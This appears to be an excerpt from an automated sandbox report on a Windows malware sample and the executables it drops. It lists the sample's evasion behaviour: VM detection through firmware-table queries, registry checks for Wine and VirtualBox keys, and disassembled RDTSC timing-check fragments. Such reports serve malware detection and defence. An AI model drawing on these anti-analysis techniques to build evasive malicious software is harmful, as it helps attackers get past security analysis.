Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4310 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8854FD885Ch 0x00000008 jg 00007F8854FD8856h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jg 00007F8854FD8857h 0x00000019 push dword ptr [ebp+122D0D25h] 0x0000001f pushad 0x00000020 mov si, ax 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1C98h] 0x0000002a pushad 0x0000002b clc 0x0000002c xor eax, eax 0x0000002e cld 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 mov dword ptr [ebp+122D1D62h], edi 0x00000039 mov dword ptr [ebp+122D2DD9h], eax 0x0000003f add dword ptr [ebp+122D1D62h], ebx 0x00000045 mov esi, 0000003Ch 0x0000004a cmc 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f pushad 0x00000050 add dword ptr [ebp+122D1D62h], esi 0x00000056 mov dword ptr [ebp+122D1D62h], ecx 0x0000005c popad 0x0000005d lodsw 0x0000005f mov dword ptr [ebp+122D1D62h], ecx 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 cmc 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e pushad 0x0000006f mov edi, dword ptr [ebp+122D2C21h] 0x00000075 movsx ecx, ax 0x00000078 popad 0x00000079 jmp 00007F8854FD8864h 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52929 second address: E52934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8854FAEB86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52934 second address: E5294A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8860h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5294A second address: E5294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5294E second address: E52961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8854FD8856h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4185F second address: E41871 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F8854FAEB86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41871 second address: E41875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41875 second address: E41882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E41882 second address: E41894 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F8854FD885Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A0D second address: E51A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A28 second address: E51A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8854FD8856h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007F8854FD8856h 0x00000014 jmp 00007F8854FD8867h 0x00000019 ja 00007F8854FD8856h 0x0000001f popad 0x00000020 jmp 00007F8854FD885Eh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51A6C second address: E51A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51BB7 second address: E51BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51BBB second address: E51BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8854FAEB95h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D6C second address: E51D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D70 second address: E51D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D76 second address: E51D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D7C second address: E51D8F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8854FAEB8Eh 0x00000008 jl 00007F8854FAEB86h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E51D8F second address: E51DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8868h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jg 00007F8854FD8867h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E52119 second address: E52132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55DB5 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 7B3031DFh 0x0000000d mov si, F0F2h 0x00000011 push dword ptr [ebp+122D0D25h] 0x00000017 mov dl, cl 0x00000019 call dword ptr [ebp+122D1C98h] 0x0000001f pushad 0x00000020 clc 0x00000021 xor eax, eax 0x00000023 cld 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 mov dword ptr [ebp+122D1D62h], edi 0x0000002e mov dword ptr [ebp+122D2DD9h], eax 0x00000034 add dword ptr [ebp+122D1D62h], ebx 0x0000003a mov esi, 0000003Ch 0x0000003f cmc 0x00000040 add esi, dword ptr [esp+24h] 0x00000044 pushad 0x00000045 add dword ptr [ebp+122D1D62h], esi 0x0000004b mov dword ptr [ebp+122D1D62h], ecx 0x00000051 popad 0x00000052 lodsw 0x00000054 mov dword ptr [ebp+122D1D62h], ecx 0x0000005a add eax, dword ptr [esp+24h] 0x0000005e cmc 0x0000005f mov ebx, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 mov edi, dword ptr [ebp+122D2C21h] 0x0000006a movsx ecx, ax 0x0000006d popad 0x0000006e jmp 00007F8854FD8864h 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55F36 second address: E55F53 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8854FAEB8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F8854FAEB86h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55F53 second address: E55FA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 703CE63Bh 0x0000000f push edx 0x00000010 and edx, dword ptr [ebp+122D5AC5h] 0x00000016 pop ecx 0x00000017 push 00000000h 0x00000019 mov ecx, dword ptr [ebp+122D2D85h] 0x0000001f call 00007F8854FD8859h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F8854FD8867h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FA3 second address: E55FB5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8854FAEB86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FB5 second address: E55FE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8854FD8869h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55FE2 second address: E56002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56002 second address: E5608D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8854FD8856h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F8854FD8865h 0x00000017 pop eax 0x00000018 add dx, 55CAh 0x0000001d sbb si, 0A74h 0x00000022 push 00000003h 0x00000024 jmp 00007F8854FD8867h 0x00000029 push 00000000h 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F8854FD8858h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D2BB9h] 0x0000004d add dword ptr [ebp+122D1E50h], edx 0x00000053 call 00007F8854FD8859h 0x00000058 jbe 00007F8854FD885Eh 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5608D second address: E560C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F8854FAEB93h 0x0000000d jmp 00007F8854FAEB97h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E560C3 second address: E560F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FD8856h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F8854FD8862h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8854FD8860h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E560F9 second address: E5611F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FAEB8Ah 0x00000008 jmp 00007F8854FAEB8Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5611F second address: E5612E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F8854FD8856h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5612E second address: E56185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b sub si, B6A8h 0x00000010 lea ebx, dword ptr [ebp+12455D1Dh] 0x00000016 clc 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 jmp 00007F8854FAEB90h 0x0000001e jmp 00007F8854FAEB8Fh 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop esi 0x0000002a je 00007F8854FAEB86h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5620E second address: E56212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56212 second address: E5627C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e popad 0x0000000f add dword ptr [esp], 0BB5653Ah 0x00000016 mov ecx, dword ptr [ebp+122D2DADh] 0x0000001c push 00000003h 0x0000001e pushad 0x0000001f push eax 0x00000020 adc ebx, 30B293F4h 0x00000026 pop esi 0x00000027 mov ecx, dword ptr [ebp+122D2CDDh] 0x0000002d popad 0x0000002e push 00000000h 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F8854FAEB88h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c xor edi, 1C7FFE00h 0x00000052 mov di, 6C83h 0x00000056 push 8CBEFDB5h 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5627C second address: E562B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 3341024Bh 0x0000000e mov edi, 51330CD5h 0x00000013 lea ebx, dword ptr [ebp+12455D28h] 0x00000019 mov edx, dword ptr [ebp+122D2D65h] 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F8854FD8863h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3C82F second address: E3C833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E737DD second address: E737E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F8854FD8856h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7391C second address: E73922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73A9F second address: E73AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C3F second address: E73C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C45 second address: E73C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73C4B second address: E73C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DB9 second address: E73DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DC1 second address: E73DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8854FAEB8Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DD0 second address: E73DE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FD8858h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DE2 second address: E73DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DE6 second address: E73DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DEE second address: E73DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E73DF6 second address: E73DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E741EE second address: E741F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74782 second address: E74787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74787 second address: E7478C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74E59 second address: E74E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8854FD8856h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FD885Ah 0x00000012 jmp 00007F8854FD885Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75013 second address: E75031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB98h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75031 second address: E75035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75035 second address: E7505D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F8854FAEB91h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F8854FAEB86h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7505D second address: E75066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E751B5 second address: E751B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75621 second address: E75631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E75631 second address: E75636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79098 second address: E790A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FD8856h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
